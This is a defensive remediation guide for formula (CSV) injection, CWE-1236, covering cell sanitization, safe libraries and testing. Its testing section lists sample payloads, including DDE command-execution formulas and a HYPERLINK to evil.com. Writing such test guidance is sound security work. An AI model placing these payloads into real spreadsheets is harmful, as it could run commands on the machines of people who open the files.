CWE-1236: Formula Injection

Overview

Formula Injection (also known as CSV Injection or Excel Injection) occurs when untrusted data containing formula metacharacters (=, +, -, @, tab, carriage return) is exported to spreadsheet files (CSV, Excel, etc.) without proper sanitization. Spreadsheet applications interpret these characters as formula directives, executing embedded commands.

OWASP Classification

A05:2025 - Injection

Risk

High: Attackers can inject malicious formulas that execute when victims open the file, potentially leading to remote code execution, data exfiltration via external requests, local file access, or credential theft. This is particularly dangerous in enterprise environments where spreadsheets are commonly shared.

Remediation Steps

Core principle: Treat spreadsheet/CSV exports as an interpreter: neutralize formula prefixes (=,+,-,@) in untrusted cells.

Locate the Spreadsheet Export Functionality

Review the security findings to identify where untrusted data is exported to spreadsheets:

• Find the source: Identify where untrusted data enters (user input, external files, databases, network requests)
• Trace to the export: Locate where CSV, Excel, or other spreadsheet files are generated
• Check the data flow: Review what data is being written to spreadsheet cells
• Identify affected columns: Determine which cells contain untrusted data

Sanitize All Spreadsheet Cell Content

Prevent formula injection by sanitizing untrusted data before writing to cells:

• Prepend single quote: Add ' (single quote) at the beginning of cells containing untrusted data
• Strip formula metacharacters: Remove or encode =, +, -, @, tab, carriage return from start of strings
• Validate cell content: Check that content doesn't start with formula triggers
• Handle leading whitespace: Remove leading spaces that could hide formula characters
• Apply to all untrusted data: Sanitize every cell that contains data from untrusted sources

Use CSV/Excel Libraries with Built-in Protection

Leverage libraries that automatically prevent formula injection:

• Use safe libraries: Choose CSV/Excel libraries with formula injection protection built-in
• Enable protection features: Configure libraries to automatically escape formulas
• Avoid manual CSV generation: Don't build CSV files with string concatenation
• Use parameterized APIs: Use library methods that handle escaping automatically

Set Appropriate File Metadata and Warnings

Provide additional protection through proper file configuration:

• Set correct MIME types: Use text/csv for CSV, proper Excel MIME types
• Include security warnings: Add warning cells or metadata about untrusted content
• Set file properties: Mark files as containing potentially unsafe content
• Provide download warnings: Inform users about risks when downloading generated files

Implement Content Security Policy for Exports

Add defense-in-depth protections:

• Validate before export: Check all data for formula characters before generating file
• Log export operations: Record what data was exported and by whom
• Monitor for injection attempts: Alert when formula characters are detected in export data
• Use allowlists: For enumerated data, validate against known-good values

Test with Formula Injection Payloads

Verify the fix prevents formula execution:

• Test with formula starters: Try =1+1, +1+1, -1+1, @SUM(A1:A10)
• Test with commands: Try =cmd|'/c calc'!A1, =HYPERLINK("http://evil.com")
• Test with DDE: Try =cmd|'/c notepad'!A1 (DDE injection)
• Test with encoding: Try formula characters with leading spaces, tabs
• Verify quotes added: Confirm single quote prepended to untrusted data cells

Additional Resources

• CWE-1236: Formula Injection
• OWASP Cheat Sheet Series
• OWASP Top 10 2025
• OWASP Top 10 2025 A05: Injection